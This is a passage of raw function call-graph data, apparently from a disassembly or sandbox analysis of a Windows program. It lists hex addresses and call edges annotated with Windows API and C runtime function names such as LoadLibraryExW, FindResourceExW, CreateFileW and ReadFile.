API calls 98491->98492 98493 23471f 98492->98493 98494 2377c7 60 API calls 98493->98494 98495 234727 98494->98495 98496 23475b 98495->98496 98497 26d8fb 98495->98497 98498 2379ab 60 API calls 98496->98498 98499 2381a7 60 API calls 98497->98499 98500 234769 98498->98500 98501 26d904 98499->98501 98502 237e8c 60 API calls 98500->98502 98503 237eec 60 API calls 98501->98503 98504 234773 98502->98504 98506 23479e 98503->98506 98505 2379ab 60 API calls 98504->98505 98504->98506 98509 234794 98505->98509 98507 2347de 98506->98507 98510 2347bd 98506->98510 98520 26d924 98506->98520 98508 2379ab 60 API calls 98507->98508 98512 2347ef 98508->98512 98513 237e8c 60 API calls 98509->98513 98554 237b52 98510->98554 98516 234801 98512->98516 98518 2381a7 60 API calls 98512->98518 98513->98506 98514 26d9f4 98517 237d2c 60 API calls 98514->98517 98519 234811 98516->98519 98522 2381a7 60 API calls 98516->98522 98527 26d9b1 98517->98527 98518->98516 98524 234818 98519->98524 98526 2381a7 60 API calls 98519->98526 98520->98514 98523 26d9dd 98520->98523 98535 26d95b 98520->98535 98521 2379ab 60 API calls 98521->98507 98522->98519 98523->98514 98531 26d9c8 98523->98531 98525 23481f Mailbox 98524->98525 98528 2381a7 60 API calls 98524->98528 98525->97982 98526->98524 98527->98507 98529 237b52 60 API calls 98527->98529 98557 237a84 60 API calls 2 library calls 98527->98557 98528->98525 98529->98527 98530 26d9b9 98532 237d2c 60 API calls 98530->98532 98533 237d2c 60 API calls 98531->98533 98532->98527 98533->98527 98535->98530 98536 26d9a4 98535->98536 98537 237d2c 60 API calls 98536->98537 98537->98527 98539 26f094 98538->98539 98540 237ca0 98538->98540 98564 288123 60 API calls _memmove 98539->98564 98558 237bb1 98540->98558 98543 237cac 98543->97989 98547 293e73 98543->98547 98544 26f09e 98545 2381a7 60 API calls 98544->98545 98546 26f0a6 Mailbox 98545->98546 98565 294696 GetFileAttributesW 98547->98565 98550->98006 98551->97964 98552->98003 98553->98003 98555 237faf 60 API calls 98554->98555 98556 2347c7 98555->98556 98556->98507 98556->98521 98557->98527 98559 237be5 _memmove 98558->98559 98560 237bbf 98558->98560 98559->98543 98560->98559 98561 250ff6 Mailbox 60 API calls 98560->98561 98562 237c34 98561->98562 98563 250ff6 Mailbox 60 API calls 98562->98563 98563->98559 98564->98544 98566 293e7a 98565->98566 98567 2946b1 FindFirstFileW 98565->98567 98566->97989 98566->98000 98567->98566 98568 2946c6 FindClose 98567->98568 98568->98566 98595 237b76 98569->98595 98571 2365ca 98602 23766f 60 API calls 2 library calls 98571->98602 98573 2365e4 Mailbox 98573->98014 98576 26e41f 98605 28fdba 92 API calls 4 library calls 98576->98605 98577 237eec 60 API calls 98588 2363c5 98577->98588 98578 23766f 60 API calls 98578->98588 98580 2368f9 98580->98573 98607 28fdba 92 API calls 4 library calls 98580->98607 98583 26e42d 98606 23766f 60 API calls 2 library calls 98583->98606 98585 26e443 98585->98573 98586 26e3bb 98587 238189 60 API calls 98586->98587 98589 26e3c6 98587->98589 98588->98571 98588->98576 98588->98577 98588->98578 98588->98580 98588->98586 98591 237faf 60 API calls 98588->98591 98594 26e3eb _memmove 98588->98594 98600 2360cc 61 API calls 98588->98600 98601 235ea1 60 API calls Mailbox 98588->98601 98603 235fd2 61 API calls 98588->98603 98604 237a84 60 API calls 2 library calls 98588->98604 98593 250ff6 Mailbox 60 API calls 98589->98593 98592 23659b CharUpperBuffW 98591->98592 98592->98588 98593->98594 98594->98576 98594->98580 98596 250ff6 Mailbox 60 API calls 98595->98596 98597 237b9b 98596->98597 98598 238189 60 API calls 98597->98598 98599 237baa 98598->98599 98599->98588 98600->98588 98601->98588 98602->98573 98603->98588 98604->98588 98605->98583 98606->98585 98607->98573 98608->98050 98610 237b76 60 API calls 98609->98610 98611 23c72c _wcscmp 98609->98611 98610->98611 98612 237f41 60 API calls 98611->98612 98615 23c760 Mailbox 98611->98615 98613 271abb 98612->98613 98614 237c8e 60 API calls 98613->98614 98616 271ac6 98614->98616 98615->98050 98629 23859a 69 API calls 98616->98629 98618 271ad7 98620 271adb Mailbox 98618->98620 98630 239e9c 61 API calls Mailbox 98618->98630 98620->98050 98622 26f173 98621->98622 98623 237e1f 98621->98623 98625 238189 60 API calls 98622->98625 98631 237db0 98623->98631 98627 26f17e __NMSG_WRITE _memmove 98625->98627 98626 237e2a 98626->98040 98628->98032 98629->98618 98630->98620 98632 237dbf __NMSG_WRITE 98631->98632 98633 238189 60 API calls 98632->98633 98634 237dd0 _memmove 98632->98634 98635 26f130 _memmove 98633->98635 98634->98626 98636->98094 98637->98066 98638->98080 98640 23f7b0 98639->98640 98641 23f61a 98639->98641 98644 237f41 60 API calls 98640->98644 98642 23f626 98641->98642 98643 274848 98641->98643 98664 23f3f0 98642->98664 98645 2abf80 332 API calls 98643->98645 98650 23f6ec Mailbox 98644->98650 98647 274856 98645->98647 98651 23f790 98647->98651 98760 29a0b5 90 API calls 4 library calls 98647->98760 98649 23f65d 98649->98647 98649->98650 98649->98651 98654 2a474d 332 API calls 98650->98654 98655 293e73 3 API calls 98650->98655 98679 29cde5 98650->98679 98651->98094 98653 23f743 98653->98651 98759 239df0 60 API calls Mailbox 98653->98759 98654->98653 98655->98653 98657->98076 98658->98082 98659->98094 98660->98092 98661->98095 98662->98099 98663->98094 98665 23f59a 98664->98665 98667 23f41c 98664->98667 98762 29a0b5 90 API calls 4 library calls 98665->98762 98667->98665 98675 23f459 _memmove 98667->98675 98668 23f533 98669 23f543 98668->98669 98761 2aa5ee 86 API calls Mailbox 98668->98761 98669->98649 98671 250ff6 60 API calls Mailbox 98671->98675 98672 274823 98764 23f803 332 API calls 98672->98764 98673 23a000 332 API calls 98673->98675 98675->98668 98675->98671 98675->98672 98675->98673 98676 2747d3 98675->98676 98677 2747d5 98675->98677 98676->98649 98763 29a0b5 90 API calls 4 library calls 98677->98763 98680 2377c7 60 API calls 98679->98680 98681 29ce1a 98680->98681 98682 2377c7 60 API calls 98681->98682 98683 29ce23 98682->98683 98684 29ce37 98683->98684 98898 239c9c 60 API calls 98683->98898 98686 239997 85 API calls 98684->98686 98687 29ce54 98686->98687 98688 29cf55 98687->98688 98689 29ce76 98687->98689 98700 29cf85 Mailbox 98687->98700 98765 234f3d 98688->98765 98690 239997 85 API calls 98689->98690 98692 29ce82 98690->98692 98694 2381a7 60 API calls 98692->98694 98698 29ce8e 98694->98698 98695 29cf81 98697 2377c7 60 API calls 98695->98697 98695->98700 98696 234f3d 137 API calls 98696->98695 98699 29cfb6 98697->98699 98702 29cea2 98698->98702 98703 29ced4 98698->98703 98701 2377c7 60 API calls 98699->98701 98700->98653 98704 29cfbf 98701->98704 98705 2381a7 60 API calls 98702->98705 98706 239997 85 API calls 98703->98706 98707 2377c7 60 API calls 98704->98707 98708 29ceb2 98705->98708 98709 29cee1 98706->98709 98710 29cfc8 98707->98710 98711 237e0b 60 API calls 98708->98711 98712 2381a7 60 API calls 98709->98712 98713 2377c7 60 API calls 98710->98713 98714 29cebc 98711->98714 98715 29ceed 98712->98715 98716 29cfd1 98713->98716 98718 239997 85 API calls 98714->98718 98899 294cd3 GetFileAttributesW 98715->98899 98717 239997 85 API calls 98716->98717 98720 29cfde 98717->98720 98721 29cec8 98718->98721 98724 2346f9 60 API calls 98720->98724 98725 237c8e 60 API calls 98721->98725 98722 29cef6 98723 29cf09 98722->98723 98726 237b52 60 API calls 98722->98726 98728 239997 85 API calls 98723->98728 98734 29cf0f 98723->98734 98727 29cff9 98724->98727 98725->98703 98726->98723 98729 237b52 60 API calls 98727->98729 98730 29cf36 98728->98730 98731 29d008 98729->98731 98900 293a2b 76 API calls Mailbox 98730->98900 98733 29d03c 98731->98733 98735 237b52 60 API calls 98731->98735 98736 2381a7 60 API calls 98733->98736 98734->98700 98737 29d019 98735->98737 98738 29d04a 98736->98738 98737->98733 98741 237d2c 60 API calls 98737->98741 98739 237c8e 60 API calls 98738->98739 98740 29d058 98739->98740 98742 237c8e 60 API calls 98740->98742 98743 29d02e 98741->98743 98744 29d066 98742->98744 98745 237d2c 60 API calls 98743->98745 98746 237c8e 60 API calls 98744->98746 98745->98733 98747 29d074 98746->98747 98748 239997 85 API calls 98747->98748 98749 29d080 98748->98749 98789 2942ad 98749->98789 98751 29d091 98752 293e73 3 API calls 98751->98752 98753 29d09b 98752->98753 98754 239997 85 API calls 98753->98754 98757 29d0cc 98753->98757 98755 29d0b9 98754->98755 98843 2993df 98755->98843 98901 234faa 98757->98901 98759->98653 98760->98651 98761->98669 98762->98676 98763->98676 98764->98676 98907 234d13 98765->98907 98770 26dd0f 98772 234faa 85 API calls 98770->98772 98771 234f68 LoadLibraryExW 98917 234cc8 98771->98917 98774 26dd16 98772->98774 98776 234cc8 3 API calls 98774->98776 98778 26dd1e 98776->98778 98943 23506b 98778->98943 98779 234f8f 98779->98778 98780 234f9b 98779->98780 98782 234faa 85 API calls 98780->98782 98784 234fa0 98782->98784 98784->98695 98784->98696 98786 26dd45 98951 235027 98786->98951 98790 2942c9 98789->98790 98791 2942dc 98790->98791 98792 2942ce 98790->98792 98794 2377c7 60 API calls 98791->98794 98793 2381a7 60 API calls 98792->98793 98842 2942d7 Mailbox 98793->98842 98795 2942e4 98794->98795 98796 2377c7 60 API calls 98795->98796 98797 2942ec 98796->98797 98798 2377c7 60 API calls 98797->98798 98799 2942f7 98798->98799 98800 2377c7 60 API calls 98799->98800 98801 2942ff 98800->98801 98802 2377c7 60 API calls 98801->98802 98803 294307 98802->98803 98804 2377c7 60 API calls 98803->98804 98805 29430f 98804->98805 98806 2377c7 60 API calls 98805->98806 98807 294317 98806->98807 98808 2377c7 60 API calls 98807->98808 98809 29431f 98808->98809 98810 2346f9 60 API calls 98809->98810 98811 294336 98810->98811 98812 2346f9 60 API calls 98811->98812 98813 29434f 98812->98813 98814 237b52 60 API calls 98813->98814 98815 29435b 98814->98815 98816 29436e 98815->98816 98817 237e8c 60 API calls 98815->98817 98818 237b52 60 API calls 98816->98818 98817->98816 98819 294377 98818->98819 98820 294387 98819->98820 98821 237e8c 60 API calls 98819->98821 98822 2381a7 60 API calls 98820->98822 98821->98820 98823 294393 98822->98823 98824 237c8e 60 API calls 98823->98824 98825 29439f 98824->98825 99424 29445f 60 API calls 98825->99424 98827 2943ae 99425 29445f 60 API calls 98827->99425 98829 2943c1 98830 237b52 60 API calls 98829->98830 98831 2943cb 98830->98831 98832 2943d0 98831->98832 98833 2943e2 98831->98833 98835 237e0b 60 API calls 98832->98835 98834 237b52 60 API calls 98833->98834 98836 2943eb 98834->98836 98837 2943dd 98835->98837 98838 294409 98836->98838 98839 237e0b 60 API calls 98836->98839 98840 237c8e 60 API calls 98837->98840 98841 237c8e 60 API calls 98838->98841 98839->98837 98840->98838 98841->98842 98842->98751 98844 2993ec __write_nolock 98843->98844 98845 250ff6 Mailbox 60 API calls 98844->98845 98846 299449 98845->98846 98847 23538e 60 API calls 98846->98847 98848 299453 98847->98848 98849 2991e9 GetSystemTimeAsFileTime 98848->98849 98850 29945e 98849->98850 98851 235045 86 API calls 98850->98851 98852 299471 _wcscmp 98851->98852 98853 299542 98852->98853 98854 299495 98852->98854 98855 2999be 97 API calls 98853->98855 99456 2999be 98854->99456 98871 29950e _wcscat 98855->98871 98859 23506b 75 API calls 98861 299567 98859->98861 98860 29954b 98860->98757 98862 23506b 75 API calls 98861->98862 98864 299577 98862->98864 98863 2994c3 _wcscat _wcscpy 99463 25432e 59 API calls __wsplitpath_helper 98863->99463 98865 23506b 75 API calls 98864->98865 98867 299592 98865->98867 98868 23506b 75 API calls 98867->98868 98869 2995a2 98868->98869 98870 23506b 75 API calls 98869->98870 98872 2995bd 98870->98872 98871->98859 98871->98860 98873 23506b 75 API calls 98872->98873 98874 2995cd 98873->98874 98875 23506b 75 API calls 98874->98875 98876 2995dd 98875->98876 98877 23506b 75 API calls 98876->98877 98878 2995ed 98877->98878 99426 299b6d GetTempPathW GetTempFileNameW 98878->99426 98880 2995f9 98881 25548b 116 API calls 98880->98881 98892 29960a 98881->98892 98882 2996c4 98885 23506b 75 API calls 98885->98892 98892->98860 98892->98882 98892->98885 99427 254a93 98892->99427 98898->98684 98899->98722 98900->98734 98902 234fb4 98901->98902 98904 234fbb 98901->98904 98903 2555d6 __fcloseall 84 API calls 98902->98903 98903->98904 98905 234fdb FreeLibrary 98904->98905 98906 234fca 98904->98906 98905->98906 98906->98700 98956 234d61 98907->98956 98910 234d61 2 API calls 98913 234d3a 98910->98913 98911 234d53 98914 25548b 98911->98914 98912 234d4a FreeLibrary 98912->98911 98913->98911 98913->98912 98960 2554a0 98914->98960 98916 234f5c 98916->98770 98916->98771 99164 234d94 98917->99164 98920 234ced 98921 234d08 98920->98921 98922 234cff FreeLibrary 98920->98922 98924 234dd0 98921->98924 98922->98921 98923 234d94 2 API calls 98923->98920 98925 250ff6 Mailbox 60 API calls 98924->98925 98926 234de5 98925->98926 98927 23538e 60 API calls 98926->98927 98928 234df1 _memmove 98927->98928 98929 234f21 98928->98929 98930 234ee9 98928->98930 98934 234e2c 98928->98934 99179 299ba5 96 API calls 98929->99179 99168 234fe9 CreateStreamOnHGlobal 98930->99168 98931 235027 70 API calls 98939 234e35 98931->98939 98934->98931 98935 23506b 75 API calls 98935->98939 98936 234ec9 98936->98779 98938 26dcd0 98940 235045 86 API calls 98938->98940 98939->98935 98939->98936 98939->98938 99174 235045 98939->99174 98941 26dce4 98940->98941 98942 23506b 75 API calls 98941->98942 98942->98936 98944 26ddf6 98943->98944 98945 23507d 98943->98945 99203 255812 98945->99203 98948 299393 99401 2991e9 98948->99401 98950 2993a9 98950->98786 98952 235036 98951->98952 98953 26ddb9 98951->98953 99406 255e90 98952->99406 98955 23503e 98957 234d2e 98956->98957 98958 234d6a LoadLibraryA 98956->98958 98957->98910 98957->98913 98958->98957 98959 234d7b GetProcAddress 98958->98959 98959->98957 98962 2554ac __fcloseall 98960->98962 98961 2554bf 99009 258d68 59 API calls __getptd_noexit 98961->99009 98962->98961 98964 2554f0 98962->98964 98979 260738 98964->98979 98965 2554c4 99010 258ff6 9 API calls __strnicoll_l 98965->99010 98968 2554f5 98969 2554fe 98968->98969 98970 25550b 98968->98970 99011 258d68 59 API calls __getptd_noexit 98969->99011 98972 255535 98970->98972 98973 255515 98970->98973 98994 260857 98972->98994 99012 258d68 59 API calls __getptd_noexit 98973->99012 98974 2554cf __fcloseall @_EH4_CallFilterFunc@8 98974->98916 98980 260744 __fcloseall 98979->98980 99014 259e4b 98980->99014 98982 2607c6 99021 26084e 98982->99021 98983 2607cd 99050 258a5d 59 API calls 2 library calls 98983->99050 98986 2607d4 98986->98982 99051 25a06b 98986->99051 98987 260843 __fcloseall 98987->98968 98991 2607fa RtlEnterCriticalSection 98991->98982 98992 260752 98992->98982 98992->98983 99024 259ed3 98992->99024 99048 256e8d 60 API calls __lock 98992->99048 99049 256ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 98992->99049 99003 260877 __wopenfile 98994->99003 98995 260891 99072 258d68 59 API calls __getptd_noexit 98995->99072 98996 260a4c 98996->98995 99000 260aaf 98996->99000 98998 260896 99073 258ff6 9 API calls __strnicoll_l 98998->99073 99069 2687f1 99000->99069 99001 255540 99013 255562 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99001->99013 99003->98995 99003->98996 99074 253a0b 61 API calls 3 library calls 99003->99074 99005 260a45 99005->98996 99075 253a0b 61 API calls 3 library calls 99005->99075 99007 260a64 99007->98996 99076 253a0b 61 API calls 3 library calls 99007->99076 99009->98965 99010->98974 99011->98974 99012->98974 99013->98974 99015 259e5c 99014->99015 99016 259e6f RtlEnterCriticalSection 99014->99016 99017 259ed3 __mtinitlocknum 58 API calls 99015->99017 99016->98992 99018 259e62 99017->99018 99018->99016 99054 2532f5 59 API calls 3 library calls 99018->99054 99055 259fb5 RtlLeaveCriticalSection 99021->99055 99023 260855 99023->98987 99025 259edf __fcloseall 99024->99025 99026 259f00 99025->99026 99027 259ee8 99025->99027 99040 259f21 __fcloseall 99026->99040 99059 258a5d 59 API calls 2 library calls 99026->99059 99056 25a3ab 59 API calls __NMSG_WRITE 99027->99056 99030 259eed 99057 25a408 59 API calls 5 library calls 99030->99057 99031 259f15 99033 259f1c 99031->99033 99034 259f2b 99031->99034 99060 258d68 59 API calls __getptd_noexit 99033->99060 99037 259e4b __lock 59 API calls 99034->99037 99035 259ef4 99058 2532df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99035->99058 99041 259f32 99037->99041 99040->98992 99042 259f57 99041->99042 99043 259f3f 99041->99043 99061 252f95 99042->99061 99044 25a06b __getstream 2 API calls 99043->99044 99046 259f4b 99044->99046 99067 259f73 RtlLeaveCriticalSection _doexit 99046->99067 99048->98992 99049->98992 99050->98986 99052 25a088 InitializeCriticalSectionAndSpinCount 99051->99052 99053 25a07b InitializeCriticalSectionEx 99051->99053 99052->98991 99053->98991 99055->99023 99056->99030 99057->99035 99059->99031 99060->99040 99062 252f9e HeapFree 99061->99062 99063 252fc7 _free 99061->99063 99062->99063 99064 252fb3 99062->99064 99063->99046 99068 258d68 59 API calls __getptd_noexit 99064->99068 99066 252fb9 GetLastError 99066->99063 99067->99040 99068->99066 99077 267fd5 99069->99077 99071 26880a 99071->99001 99072->98998 99073->99001 99074->99005 99075->99007 99076->98996 99078 267fe1 __fcloseall 99077->99078 99079 267ff7 99078->99079 99082 26802d 99078->99082 99161 258d68 59 API calls __getptd_noexit 99079->99161 99081 267ffc 99162 258ff6 9 API calls __strnicoll_l 99081->99162 99088 26809e 99082->99088 99085 268049 99163 268072 RtlLeaveCriticalSection __unlock_fhandle 99085->99163 99087 268006 __fcloseall 99087->99071 99089 2680be 99088->99089 99090 25471a __wsopen_nolock 59 API calls 99089->99090 99093 2680da 99090->99093 99091 259006 __invoke_watson 8 API calls 99092 2687f0 99091->99092 99095 267fd5 __wsopen_helper 104 API calls 99092->99095 99094 268114 99093->99094 99101 268137 99093->99101 99137 268211 99093->99137 99096 258d34 __read_nolock 59 API calls 99094->99096 99097 26880a 99095->99097 99098 268119 99096->99098 99097->99085 99099 258d68 __lseeki64_nolock 59 API calls 99098->99099 99100 268126 99099->99100 99103 258ff6 __strnicoll_l 9 API calls 99100->99103 99102 2681f5 99101->99102 99110 2681d3 99101->99110 99104 258d34 __read_nolock 59 API calls 99102->99104 99105 268130 99103->99105 99106 2681fa 99104->99106 99105->99085 99107 258d68 __lseeki64_nolock 59 API calls 99106->99107 99108 268207 99107->99108 99109 258ff6 __strnicoll_l 9 API calls 99108->99109 99109->99137 99111 25d4d4 __alloc_osfhnd 62 API calls 99110->99111 99112 2682a1 99111->99112 99113 2682ce 99112->99113 99114 2682ab 99112->99114 99115 267f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99113->99115 99116 258d34 __read_nolock 59 API calls 99114->99116 99124 2682f0 99115->99124 99117 2682b0 99116->99117 99119 258d68 __lseeki64_nolock 59 API calls 99117->99119 99118 26836e GetFileType 99122 2683bb 99118->99122 99123 268379 GetLastError 99118->99123 99121 2682ba 99119->99121 99120 26833c GetLastError 99125 258d47 __dosmaperr 59 API calls 99120->99125 99126 258d68 __lseeki64_nolock 59 API calls 99121->99126 99133 25d76a __set_osfhnd 60 API calls 99122->99133 99127 258d47 __dosmaperr 59 API calls 99123->99127 99124->99118 99124->99120 99129 267f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99124->99129 99130 268361 99125->99130 99126->99105 99128 2683a0 CloseHandle 99127->99128 99128->99130 99131 2683ae 99128->99131 99132 268331 99129->99132 99135 258d68 __lseeki64_nolock 59 API calls 99130->99135 99134 258d68 __lseeki64_nolock 59 API calls 99131->99134 99132->99118 99132->99120 99139 2683d9 99133->99139 99136 2683b3 99134->99136 99135->99137 99136->99130 99137->99091 99138 268594 99138->99137 99141 268767 CloseHandle 99138->99141 99139->99138 99140 261b11 __lseeki64_nolock 61 API calls 99139->99140 99156 26845a 99139->99156 99142 268443 99140->99142 99143 267f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99141->99143 99144 258d34 __read_nolock 59 API calls 99142->99144 99142->99156 99146 26878e 99143->99146 99144->99156 99145 2610ab 71 API calls __read_nolock 99145->99156 99147 268796 GetLastError 99146->99147 99148 2687c2 99146->99148 99149 258d47 __dosmaperr 59 API calls 99147->99149 99148->99137 99150 2687a2 99149->99150 99153 25d67d __free_osfhnd 60 API calls 99150->99153 99151 260d2d __close_nolock 62 API calls 99151->99156 99152 261b11 61 API calls __lseeki64_nolock 99152->99156 99153->99148 99154 2699f2 __chsize_nolock 83 API calls 99154->99156 99155 25dac6 __write 79 API calls 99155->99156 99156->99138 99156->99145 99156->99151 99156->99152 99156->99154 99156->99155 99157 268611 99156->99157 99158 260d2d __close_nolock 62 API calls 99157->99158 99159 268618 99158->99159 99160 258d68 __lseeki64_nolock 59 API calls 99159->99160 99160->99137 99161->99081 99162->99087 99163->99087 99165 234ce1 99164->99165 99166 234d9d LoadLibraryA 99164->99166 99165->98920 99165->98923 99166->99165 99167 234dae GetProcAddress 99166->99167 99167->99165 99169 235003 FindResourceExW 99168->99169 99173 235020 99168->99173 99170 26dd5c LoadResource 99169->99170 99169->99173 99171 26dd71 SizeofResource 99170->99171 99170->99173 99172 26dd85 LockResource 99171->99172 99171->99173 99172->99173 99173->98934 99175 26ddd4 99174->99175 99176 235054 99174->99176 99180 255a7d 99176->99180 99178 235062 99178->98939 99179->98934 99181 255a89 __fcloseall 99180->99181 99182 255a9b 99181->99182 99183 255ac1 99181->99183 99193 258d68 59 API calls __getptd_noexit 99182->99193 99195 256e4e 99183->99195 99186 255aa0 99194 258ff6 9 API calls __strnicoll_l 99186->99194 99190 255ad6 99202 255af8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99190->99202 99192 255aab __fcloseall 99192->99178 99193->99186 99194->99192 99196 256e80 RtlEnterCriticalSection 99195->99196 99197 256e5e 99195->99197 99199 255ac7 99196->99199 99197->99196 99198 256e66 99197->99198 99200 259e4b __lock 59 API calls 99198->99200 99201 2559ee 84 API calls 5 library calls 99199->99201 99200->99199 99201->99190 99202->99192 99206 25582d 99203->99206 99205 23508e 99205->98948 99207 255839 __fcloseall 99206->99207 99208 25587c 99207->99208 99209 255874 __fcloseall 99207->99209 99210 25584f _memset 99207->99210 99211 256e4e __lock_file 60 API calls 99208->99211 99209->99205 99233 258d68 59 API calls __getptd_noexit 99210->99233 99213 255882 99211->99213 99219 25564d 99213->99219 99214 255869 99234 258ff6 9 API calls __strnicoll_l 99214->99234 99223 255668 _memset 99219->99223 99225 255683 99219->99225 99220 255673 99331 258d68 59 API calls __getptd_noexit 99220->99331 99222 255678 99332 258ff6 9 API calls __strnicoll_l 99222->99332 99223->99220 99223->99225 99230 2556c3 99223->99230 99235 2558b6 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99225->99235 99227 2557d4 _memset 99334 258d68 59 API calls __getptd_noexit 99227->99334 99230->99225 99230->99227 99236 254916 99230->99236 99243 2610ab 99230->99243 99311 260df7 99230->99311 99333 260f18 59 API calls 4 library calls 99230->99333 99233->99214 99234->99209 99235->99209 99237 254935 99236->99237 99238 254920 99236->99238 99237->99230 99335 258d68 59 API calls __getptd_noexit 99238->99335 99240 254925 99336 258ff6 9 API calls __strnicoll_l 99240->99336 99242 254930 99242->99230 99244 2610e3 99243->99244 99245 2610cc 99243->99245 99247 26181b 99244->99247 99251 26111d 99244->99251 99346 258d34 59 API calls __getptd_noexit 99245->99346 99362 258d34 59 API calls __getptd_noexit 99247->99362 99248 2610d1 99347 258d68 59 API calls __getptd_noexit 99248->99347 99255 261125 99251->99255 99261 26113c 99251->99261 99252 261820 99363 258d68 59 API calls __getptd_noexit 99252->99363 99254 2610d8 99254->99230 99348 258d34 59 API calls __getptd_noexit 99255->99348 99256 261131 99364 258ff6 9 API calls __strnicoll_l 99256->99364 99258 26112a 99349 258d68 59 API calls __getptd_noexit 99258->99349 99260 261151 99350 258d34 59 API calls __getptd_noexit 99260->99350 99261->99254 99261->99260 99263 26116b 99261->99263 99265 261189 99261->99265 99263->99260 99269 261176 99263->99269 99351 258a5d 59 API calls 2 library calls 99265->99351 99267 261199 99270 2611a1 99267->99270 99271 2611bc 99267->99271 99337 265ebb 99269->99337 99352 258d68 59 API calls __getptd_noexit 99270->99352 99354 261b11 61 API calls 2 library calls 99271->99354 99272 26128a 99274 261303 ReadFile 99272->99274 99279 2612a0 GetConsoleMode 99272->99279 99277 261325 99274->99277 99278 2617e3 GetLastError 99274->99278 99276 2611a6 99353 258d34 59 API calls __getptd_noexit 99276->99353 99277->99278 99285 2612f5 99277->99285 99281 2612e3 99278->99281 99282 2617f0 99278->99282 99283 2612b4 99279->99283 99284 261300 99279->99284 99288 2612e9 99281->99288 99355 258d47 59 API calls 3 library calls 99281->99355 99360 258d68 59 API calls __getptd_noexit 99282->99360 99283->99284 99287 2612ba ReadConsoleW 99283->99287 99284->99274 99285->99288 99294 26135a 99285->99294 99300 2615c7 99285->99300 99287->99285 99290 2612dd GetLastError 99287->99290 99288->99254 99293 252f95 _free 59 API calls 99288->99293 99289 2617f5 99361 258d34 59 API calls __getptd_noexit 99289->99361 99290->99281 99293->99254 99296 2613c6 ReadFile 99294->99296 99302 261447 99294->99302 99297 2613e7 GetLastError 99296->99297 99309 2613f1 99296->99309 99297->99309 99298 261504 99305 2614b4 MultiByteToWideChar 99298->99305 99358 261b11 61 API calls 2 library calls 99298->99358 99299 2614f4 99357 258d68 59 API calls __getptd_noexit 99299->99357 99300->99288 99301 2616cd ReadFile 99300->99301 99304 2616f0 GetLastError 99301->99304 99310 2616fe 99301->99310 99302->99288 99302->99298 99302->99299 99302->99305 99304->99310 99305->99288 99305->99290 99309->99294 99356 261b11 61 API calls 2 library calls 99309->99356 99310->99300 99359 261b11 61 API calls 2 library calls 99310->99359 99312 260e02 99311->99312 99316 260e17 99311->99316 99398 258d68 59 API calls __getptd_noexit 99312->99398 99314 260e07 99399 258ff6 9 API calls __strnicoll_l 99314->99399 99317 260e4c 99316->99317 99324 260e12 99316->99324 99400 266234 59 API calls __malloc_crt 99316->99400 99319 254916 __fputwc_nolock 59 API calls 99317->99319 99320 260e60 99319->99320 99365 260f97 99320->99365 99322 260e67 99323 254916 __fputwc_nolock 59 API calls 99322->99323 99322->99324 99325 260e8a 99323->99325 99324->99230 99325->99324 99326 254916 __fputwc_nolock 59 API calls 99325->99326 99327 260e96 99326->99327 99327->99324 99328 254916 __fputwc_nolock 59 API calls 99327->99328 99329 260ea3 99328->99329 99330 254916 __fputwc_nolock 59 API calls 99329->99330 99330->99324 99331->99222 99332->99225 99333->99230 99334->99222 99335->99240 99336->99242 99338 265ec6 99337->99338 99339 265ed3 99337->99339 99340 258d68 __lseeki64_nolock 59 API calls 99338->99340 99342 265edf 99339->99342 99343 258d68 __lseeki64_nolock 59 API calls 99339->99343 99341 265ecb 99340->99341 99341->99272 99342->99272 99344 265f00 99343->99344 99345 258ff6 __strnicoll_l 9 API calls 99344->99345 99345->99341 99346->99248 99347->99254 99348->99258 99349->99256 99350->99258 99351->99267 99352->99276 99353->99254 99354->99269 99355->99288 99356->99309 99357->99288 99358->99305 99359->99310 99360->99289 99361->99288 99362->99252 99363->99256 99364->99254 99366 260fa3 __fcloseall 99365->99366 99367 260fc7 99366->99367 99368 260fb0 99366->99368 99369 26108b 99367->99369 99371 260fdb 99367->99371 99370 258d34 __read_nolock 59 API calls 99368->99370 99372 258d34 __read_nolock 59 API calls 99369->99372 99373 260fb5 99370->99373 99374 261006 99371->99374 99375 260ff9 99371->99375 99376 260ffe 99372->99376 99377 258d68 __lseeki64_nolock 59 API calls 99373->99377 99379 261013 99374->99379 99380 261028 99374->99380 99378 258d34 __read_nolock 59 API calls 99375->99378 99383 258d68 __lseeki64_nolock 59 API calls 99376->99383 99389 260fbc __fcloseall 99377->99389 99378->99376 99381 258d34 __read_nolock 59 API calls 99379->99381 99382 25d446 ___lock_fhandle 60 API calls 99380->99382 99385 261018 99381->99385 99386 26102e 99382->99386 99384 261020 99383->99384 99392 258ff6 __strnicoll_l 9 API calls 99384->99392 99390 258d68 __lseeki64_nolock 59 API calls 99385->99390 99387 261054 99386->99387 99388 261041 99386->99388 99393 258d68 __lseeki64_nolock 59 API calls 99387->99393 99391 2610ab __read_nolock 71 API calls 99388->99391 99389->99322 99390->99384 99394 26104d 99391->99394 99392->99389 99395 261059 99393->99395 99397 261083 __read RtlLeaveCriticalSection 99394->99397 99396 258d34 __read_nolock 59 API calls 99395->99396 99396->99394 99397->99389 99398->99314 99399->99324 99400->99317 99404 25543a GetSystemTimeAsFileTime 99401->99404 99403 2991f8 99403->98950 99405 255468 __aulldiv 99404->99405 99405->99403 99407 255e9c __fcloseall 99406->99407 99408 255ec3 99407->99408 99409 255eae 99407->99409 99411 256e4e __lock_file 60 API calls 99408->99411 99420 258d68 59 API calls __getptd_noexit 99409->99420 99413 255ec9 99411->99413 99412 255eb3 99421 258ff6 9 API calls __strnicoll_l 99412->99421 99422 255b00 68 API calls 6 library calls 99413->99422 99416 255ed4 99423 255ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99416->99423 99418 255ee6 99419 255ebe __fcloseall 99418->99419 99419->98955 99420->99412 99421->99419 99422->99416 99423->99418 99424->98827 99425->98829 99426->98880 99458 2999d2 __tzset_nolock _wcscmp 99456->99458 99457 23506b 75 API calls 99457->99458 99458->99457 99459 299393 GetSystemTimeAsFileTime 99458->99459 99460 29949a 99458->99460 99461 235045 86 API calls 99458->99461 99459->99458 99460->98860 99462 25432e 59 API calls __wsplitpath_helper 99460->99462 99461->99458 99462->98863 99463->98871 99789 